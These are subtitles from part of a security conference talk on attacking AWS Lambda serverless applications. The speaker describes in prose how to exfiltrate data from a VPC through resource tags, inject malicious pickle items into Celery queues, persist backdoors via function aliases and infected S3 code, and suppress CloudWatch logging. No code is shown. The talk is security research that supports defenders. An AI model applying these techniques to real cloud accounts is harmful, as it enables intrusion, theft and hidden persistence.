Dialogue: 0,0:21:40.32,0:21:46.41,Default,,0000,0000,0000,,this is a pretty common architecture for\Nbig data using lambda. What is a VPC?
Dialogue: 0,0:21:46.41,0:21:50.85,Default,,0000,0000,0000,,Great question! Amazon VPC provides\Nadvanced security features such as
Dialogue: 0,0:21:50.85,0:21:55.53,Default,,0000,0000,0000,,security groups and network access control\Nlists to enable inbound and outbound
Dialogue: 0,0:21:55.53,0:22:01.58,Default,,0000,0000,0000,,filtering at the instance level and subnet\Nlevel. Sounds bad. It is. The good news.
Dialogue: 0,0:22:01.58,0:22:08.01,Default,,0000,0000,0000,,Super easy to fuck up! Especially if you\Nread Amazons old docs and the AWS forum.
Dialogue: 0,0:22:08.01,0:22:16.31,Default,,0000,0000,0000,,So lambda has access to these VPC resources. \Naka Lambda is our VPC hole puncher.
Dialogue: 0,0:22:16.31,0:22:20.61,Default,,0000,0000,0000,,If you're, you know, depending on how\Nthey've implemented it, this may actually
Dialogue: 0,0:22:20.61,0:22:27.27,Default,,0000,0000,0000,,mean that Amazon can access your internal\Ncorporate network, which is pretty cool.
Dialogue: 0,0:22:27.27,0:22:30.97,Default,,0000,0000,0000,,But we don't actually even need to use the\Nnetwork to do that, so I'm not gonna show
Dialogue: 0,0:22:30.97,0:22:36.43,Default,,0000,0000,0000,,you how to do that one, you figure that\Nout on your own, to exfil from a VPC
Dialogue: 0,0:22:36.43,0:22:42.53,Default,,0000,0000,0000,,without touching the VPC network. So this\Nis our architecture. Step 1, upload the
Dialogue: 0,0:22:42.53,0:22:49.59,Default,,0000,0000,0000,,malicious file, like I've indicated here\Nwith a cool cyber skull. This will give us
Dialogue: 0,0:22:49.59,0:22:56.38,Default,,0000,0000,0000,,code execution in the Lambda environment.\NWe gonna put out a bunch of canaries. So
Dialogue: 0,0:22:56.38,0:23:02.52,Default,,0000,0000,0000,,we're gonna try calling SMS, e-mail, DNS,\NS3, queues, everything that is available
Dialogue: 0,0:23:02.52,0:23:07.05,Default,,0000,0000,0000,,to us, just try to put some information\Nout that we can read back. In this case we
Dialogue: 0,0:23:07.05,0:23:12.96,Default,,0000,0000,0000,,see that we can type our results into the\Nbucket, so we can get information that way.
Dialogue: 0,0:23:12.96,0:23:18.55,Default,,0000,0000,0000,,So we have bidirectional communication \Nto an owned lambda service.
Dialogue: 0,0:23:18.55,0:23:24.25,Default,,0000,0000,0000,,When we use the keys that we've exfiltrated\Nthat way, we look at the policy,
Dialogue: 0,0:23:24.25,0:23:29.88,Default,,0000,0000,0000,,we see that we have the lambda VPC\Naccess execution role from earlier, with
Dialogue: 0,0:23:29.88,0:23:35.19,Default,,0000,0000,0000,,resource * which is nice and our\NDescribeNetworkInterfaces create network
Dialogue: 0,0:23:35.19,0:23:38.81,Default,,0000,0000,0000,,interfaces permessions that we saw\Nearlier, that Amazon recommends as well as
Dialogue: 0,0:23:38.81,0:23:46.15,Default,,0000,0000,0000,,simple S3 and SQS access just for the\Nnecessary functions that we want for the
Dialogue: 0,0:23:46.15,0:23:53.33,Default,,0000,0000,0000,,application. Our target in this case is the\Ndatabase which is still inside the VPC, so
Dialogue: 0,0:23:53.33,0:23:58.85,Default,,0000,0000,0000,,we no access to, direct access to the\Ndatabase from our lambda execution
Dialogue: 0,0:23:58.85,0:24:03.90,Default,,0000,0000,0000,,environment because it's all wrapped up in\Nthis VPC. But what we can do is, we can
Dialogue: 0,0:24:03.90,0:24:11.94,Default,,0000,0000,0000,,add things to the SQS queue. And if they're\Nusing Celery, actually uses pickle, is a
Dialogue: 0,0:24:11.94,0:24:17.03,Default,,0000,0000,0000,,way to shuttle information about – for the\Njavascript developers, it's a bit like
Dialogue: 0,0:24:17.03,0:24:23.100,Default,,0000,0000,0000,,using eval to figure out javascript. So if\Nwe're able to add something, to, or, this
Dialogue: 0,0:24:23.100,0:24:27.99,Default,,0000,0000,0000,,is kind of manoeuvrer, like this is use \Nwhatever technique that,
Dialogue: 0,0:24:27.99,0:24:33.79,Default,,0000,0000,0000,,you know, you prefer from there \Nto get your code on to the cluster
Dialogue: 0,0:24:33.79,0:24:40.07,Default,,0000,0000,0000,,but we're gonna use this pickle celery bug\Nto create an item on the queue,
Dialogue: 0,0:24:40.07,0:24:45.91,Default,,0000,0000,0000,,a malicious item on the queue, that will\Nthen be picked up and run on the compute
Dialogue: 0,0:24:45.91,0:24:51.47,Default,,0000,0000,0000,,cluster. So now we have code execution on\Nthe cluster, but we have no way to
Dialogue: 0,0:24:51.47,0:24:56.39,Default,,0000,0000,0000,,actually directly communicating to it,\Nbecause we're locked out of the VPC. What
Dialogue: 0,0:24:56.39,0:25:01.55,Default,,0000,0000,0000,,do we do now? So the interesting this is\Nactually use meta information about the
Dialogue: 0,0:25:01.55,0:25:08.33,Default,,0000,0000,0000,,VPC to exfil the information that we want,\Nso because we have the ability to describe
Dialogue: 0,0:25:08.33,0:25:17.86,Default,,0000,0000,0000,,network interfaces, inside the VPC, we\Ncall, we add tags, to this, to the EC2
Dialogue: 0,0:25:17.86,0:25:22.15,Default,,0000,0000,0000,,instances and the network interfaces to\Nwhich they communicate. A lot of times
Dialogue: 0,0:25:22.15,0:25:26.82,Default,,0000,0000,0000,,they have this permission because tagging\Nis useful for the admins who wanna see
Dialogue: 0,0:25:26.82,0:25:33.70,Default,,0000,0000,0000,,what groups are owning what So we can add\Nthe meta information about that to the
Dialogue: 0,0:25:33.70,0:25:38.39,Default,,0000,0000,0000,,network interface itself because the\Nlambda has the ability to read these tags
Dialogue: 0,0:25:38.39,0:25:43.14,Default,,0000,0000,0000,,back out, we can then get the information\Nthat we want, we can put it through the S3
Dialogue: 0,0:25:43.14,0:25:49.100,Default,,0000,0000,0000,,and we can extract the information\Nthis way. So nice! This also works for the
Dialogue: 0,0:25:49.100,0:25:56.00,Default,,0000,0000,0000,,application binaries because we can encode\Nsomething in Base64 and then put that in
Dialogue: 0,0:25:56.00,0:26:03.67,Default,,0000,0000,0000,,the tag set, and get that out that way\NWhich is nice! Similarly is the compute
Dialogue: 0,0:26:03.67,0:26:08.51,Default,,0000,0000,0000,,cluster able to modify DNS entries that we\Ncan read, or is it able to create a named
Dialogue: 0,0:26:08.51,0:26:14.01,Default,,0000,0000,0000,,log groups, is it able to create queues,\Nis it able to create buckets, etc, etc be
Dialogue: 0,0:26:14.01,0:26:19.48,Default,,0000,0000,0000,,creative with the AWS services the're\Navailable, there is lots! And a single
Dialogue: 0,0:26:19.48,0:26:23.15,Default,,0000,0000,0000,,overlapping permission can be enough In\Nfact, even a single overlapping service
Dialogue: 0,0:26:23.15,0:26:29.80,Default,,0000,0000,0000,,can be enough for information exfiltration\Nfor instance you can encode information in
Dialogue: 0,0:26:29.80,0:26:34.08,Default,,0000,0000,0000,,the length of the queue and then read that\Nback out you could use the same thing with
Dialogue: 0,0:26:34.08,0:26:37.89,Default,,0000,0000,0000,,the number of number of network interfaces\Nthat are available besides of the
Dialogue: 0,0:26:37.89,0:26:43.42,Default,,0000,0000,0000,,database, anything like that. So that's\Npretty cool! What if they fix the bug?
Dialogue: 0,0:26:43.42,0:26:48.04,Default,,0000,0000,0000,,Persistence, aka how can we permanently\Ninfect a system with no permanent
Dialogue: 0,0:26:48.04,0:26:54.21,Default,,0000,0000,0000,,infrastructure? aka abusing cloud vendor\Nfeatures, continued. One neat lambda
Dialogue: 0,0:26:54.21,0:26:57.64,Default,,0000,0000,0000,,feature that is available is the idea of\Nfunction aliasing so Amazon will
Dialogue: 0,0:26:57.64,0:27:02.10,Default,,0000,0000,0000,,automatically give you like labels for the\Navailable functions, and store all of the
Dialogue: 0,0:27:02.10,0:27:07.25,Default,,0000,0000,0000,,old functions with aliases for you, which\Nis useful for, you know, application
Dialogue: 0,0:27:07.25,0:27:11.28,Default,,0000,0000,0000,,maintainers because they can provide\Nrollbacks and something goes wrong, they
Dialogue: 0,0:27:11.28,0:27:15.51,Default,,0000,0000,0000,,can tag their dev and prod and staging\Nenvironments and stuff like that as an
Dialogue: 0,0:27:15.51,0:27:22.06,Default,,0000,0000,0000,,audit trail. But we can also use it to\Npersist our malware. So we can get the
Dialogue: 0,0:27:22.06,0:27:26.99,Default,,0000,0000,0000,,function, get the source code for any\Nfunction that's available this way, we can
Dialogue: 0,0:27:26.99,0:27:33.45,Default,,0000,0000,0000,,upload a backdoored version of that and\Nthen alias it to one of those previous
Dialogue: 0,0:27:33.45,0:27:38.81,Default,,0000,0000,0000,,functions and hide it there if we need to\Naccess it without having it, be uploaded
Dialogue: 0,0:27:38.81,0:27:42.35,Default,,0000,0000,0000,,every time. An alternate route, which is\Nespecially useful if the application is
Dialogue: 0,0:27:42.35,0:27:47.03,Default,,0000,0000,0000,,being deployed by travis, or some CI\Nsystem, anything that uses CloudFormation.
Dialogue: 0,0:27:47.03,0:27:54.08,Default,,0000,0000,0000,,CloudFormation requires the code to be\Nhosted on S3 permanently, for doing it's
Dialogue: 0,0:27:54.08,0:27:59.13,Default,,0000,0000,0000,,update function. So if we just infect the\Ncode that's on S3, the next time that the
Dialogue: 0,0:27:59.13,0:28:06.59,Default,,0000,0000,0000,,CI updates the application stack, it'll\Nuse our infected code, which is useful.
Dialogue: 0,0:28:06.59,0:28:11.11,Default,,0000,0000,0000,,This is cool because if we have access to\Nthe code buckets, than we can actually use
Dialogue: 0,0:28:11.11,0:28:16.57,Default,,0000,0000,0000,,a single infected lambda to infect all the\Nother lambda functions that are available
Dialogue: 0,0:28:16.57,0:28:23.16,Default,,0000,0000,0000,,in the stack. One better is to actually\Ntreat the entire model serverlessly.
Dialogue: 0,0:28:23.16,0:28:29.63,Default,,0000,0000,0000,,So imagine if we have a simple application\Nusing the Foo lambda that's triggered when
Dialogue: 0,0:28:29.63,0:28:35.96,Default,,0000,0000,0000,,there is a SQS event. Which is actually\Ngonna be one function and then all the old
Dialogue: 0,0:28:35.96,0:28:42.61,Default,,0000,0000,0000,,functions aliased all the way back to\Nfunction 1. So if we can infect this one
Dialogue: 0,0:28:42.61,0:28:50.12,Default,,0000,0000,0000,,with some bug that we're exploiting, and\Nwe're able to create a backdoored function
Dialogue: 0,0:28:50.12,0:28:54.45,Default,,0000,0000,0000,,we can use the same code, create the new\Nfunction, but it's backdoored, and then
Dialogue: 0,0:28:54.45,0:29:00.42,Default,,0000,0000,0000,,alias that back to the first function\Nthat'll now contain our backdoored code,
Dialogue: 0,0:29:00.42,0:29:07.11,Default,,0000,0000,0000,,we can create an event trigger, so that\Nwhenever new code is updated, is submitted
Dialogue: 0,0:29:07.11,0:29:12.03,Default,,0000,0000,0000,,to the S3 bucket where the functions are\Nregistered, that will actually trigger the
Dialogue: 0,0:29:12.03,0:29:19.32,Default,,0000,0000,0000,,execution of our malware, which will get\Nthe code of the new function infected with
Dialogue: 0,0:29:19.32,0:29:24.84,Default,,0000,0000,0000,,our backdoor, recreate the function,\Ndelete the new one, and then we have, you
Dialogue: 0,0:29:24.84,0:29:30.39,Default,,0000,0000,0000,,know, our backdoored version of the latest\Ncode that is permanently available for
Dialogue: 0,0:29:30.39,0:29:37.96,Default,,0000,0000,0000,,every request, new code uploads are the\Ntrigger for reinfection of our malware.
Dialogue: 0,0:29:37.96,0:29:42.96,Default,,0000,0000,0000,,Part 5 cleaning up I'll go fast here, is\Nboring. Full disclosure, I'm not very
Dialogue: 0,0:29:42.96,0:29:49.77,Default,,0000,0000,0000,,tidy, so be careful with all this stuff if\Nyou need to be real stealthy. All lambda
Dialogue: 0,0:29:49.77,0:29:53.23,Default,,0000,0000,0000,,executions have unique execution IDs, if\Nyou just write them down, you can delete
Dialogue: 0,0:29:53.23,0:29:58.32,Default,,0000,0000,0000,,them later. But the errors there still\Ngonna trigger the CloudWatch alarms, so
Dialogue: 0,0:29:58.32,0:30:04.57,Default,,0000,0000,0000,,can you hop off the log group, that's also\Navailable in the environment variables?
Dialogue: 0,0:30:04.57,0:30:09.49,Default,,0000,0000,0000,,No you can't, but you can change the\Nretention policy, so, maybe we can just
Dialogue: 0,0:30:09.49,0:30:14.21,Default,,0000,0000,0000,,have it's own, and hopefully they don't\Nlook at logs. That's not very good, a
Dialogue: 0,0:30:14.21,0:30:20.54,Default,,0000,0000,0000,,better technique is actually to don't log\Nanything to begin with. So because these
Dialogue: 0,0:30:20.54,0:30:25.68,Default,,0000,0000,0000,,functions have extremely limited memory\Nsize, cause they only build to do one
Dialogue: 0,0:30:25.68,0:30:31.86,Default,,0000,0000,0000,,thing, if we exhaust the memory of the\Nfunction, there's not enough memory to
Dialogue: 0,0:30:31.86,0:30:39.12,Default,,0000,0000,0000,,actually do the logging properly, so if we\Nwrap all of our canary code inside of
Dialogue: 0,0:30:39.12,0:30:44.30,Default,,0000,0000,0000,,exception handlers, that'll then just\Nallocate all the memory that's available,
Dialogue: 0,0:30:44.30,0:30:49.23,Default,,0000,0000,0000,,then it doesn't count as an invocation\Nerror and it won't actually register ...
Dialogue: 0,0:30:49.23,0:30:54.89,Default,,0000,0000,0000,,{\i1}applause{\i0}
Dialogue: 0,0:30:54.89,0:31:00.16,Default,,0000,0000,0000,,Shout out to Dee, he told me that trick, \Nmy friend. One copy out of this, one
Dialogue: 0,0:31:00.16,0:31:06.45,Default,,0000,0000,0000,,pattern is to... time did go super fast...\Nif they are logging everything, the flip
Dialogue: 0,0:31:06.45,0:31:09.63,Default,,0000,0000,0000,,side of that is that they're logging\Neverything so that you can go and get
Dialogue: 0,0:31:09.63,0:31:16.19,Default,,0000,0000,0000,,everybodys password and stuff, so that's\Nfun. Part 6 synthesis happy Christmas,
Dialogue: 0,0:31:16.19,0:31:24.38,Default,,0000,0000,0000,,everybody, ho ho ho, I'm Santa Claus and\NI'm giving you a present I'm giving you an
Dialogue: 0,0:31:24.38,0:31:29.88,Default,,0000,0000,0000,,AWS Lambda Infection Toolkit! Call mackenzie\Nyou can figure out why on your own.
Dialogue: 0,0:31:29.88,0:31:37.40,Default,,0000,0000,0000,,It can do a lot of the tricks that we\Ntalked about today. Exfil, infiltration,
Dialogue: 0,0:31:37.40,0:31:43.38,Default,,0000,0000,0000,,creating reinfection handlers, all the\Nstuff, maybe your feature, put it on
Dialogue: 0,0:31:43.38,0:31:48.95,Default,,0000,0000,0000,,github this afternoon, check it out! In\Nconclusion, server-less architectures present
Dialogue: 0,0:31:48.95,0:31:53.35,Default,,0000,0000,0000,,new obstacles, but we can defeat those\Nobstacles by abusing cloud features
Dialogue: 0,0:31:53.35,0:31:56.74,Default,,0000,0000,0000,,themselves. Do you need secure serverless\Napps, you should hire me.
Dialogue: 0,0:31:56.74,0:31:57.74,Default,,0000,0000,0000,,{\i1}laughing{\i0}
Dialogue: 0,0:31:57.74,0:32:01.38,Default,,0000,0000,0000,,Do you want to contribute code, you should\Ncheck out my github. You should also check
Dialogue: 0,0:32:01.38,0:32:04.61,Default,,0000,0000,0000,,out the slack channel. Shout out to\Neverybody in the zappa slack, is a ton of
Dialogue: 0,0:32:04.61,0:32:09.90,Default,,0000,0000,0000,,super smart AWS people doing interesting\Nthings in there, thank you!
Dialogue: 0,0:32:09.90,0:32:12.07,Default,,0000,0000,0000,,{\i1}applause{\i0}
Dialogue: 0,0:32:12.07,0:32:16.04,Default,,0000,0000,0000,,Herald: Allright, perfect.
Dialogue: 0,0:32:16.04,0:32:19.18,Default,,0000,0000,0000,,{\i1}applause{\i0}
Dialogue: 0,0:32:19.18,0:32:24.89,Default,,0000,0000,0000,,Herald: Thanks a lot Rich. Unfortunately we don't\Nhave any time left for Q&amp;A, but, are you
Dialogue: 0,0:32:24.89,0:32:28.76,Default,,0000,0000,0000,,gonna be around for questions, perfect.\NSo if you are in the room, you can just
Dialogue: 0,0:32:28.76,0:32:35.84,Default,,0000,0000,0000,,come, ask Rich questions, if you are\Nremote, you've seen the contact possibilities.
Dialogue: 0,0:32:37.53,0:32:43.03,Default,,0000,0000,0000,,{\i1}closing music{\i0}
Dialogue: 0,0:32:43.03,0:33:02.00,Default,,0000,0000,0000,,subtitles created by c3subtitles.de\Nin the year 2017. Join, and help us!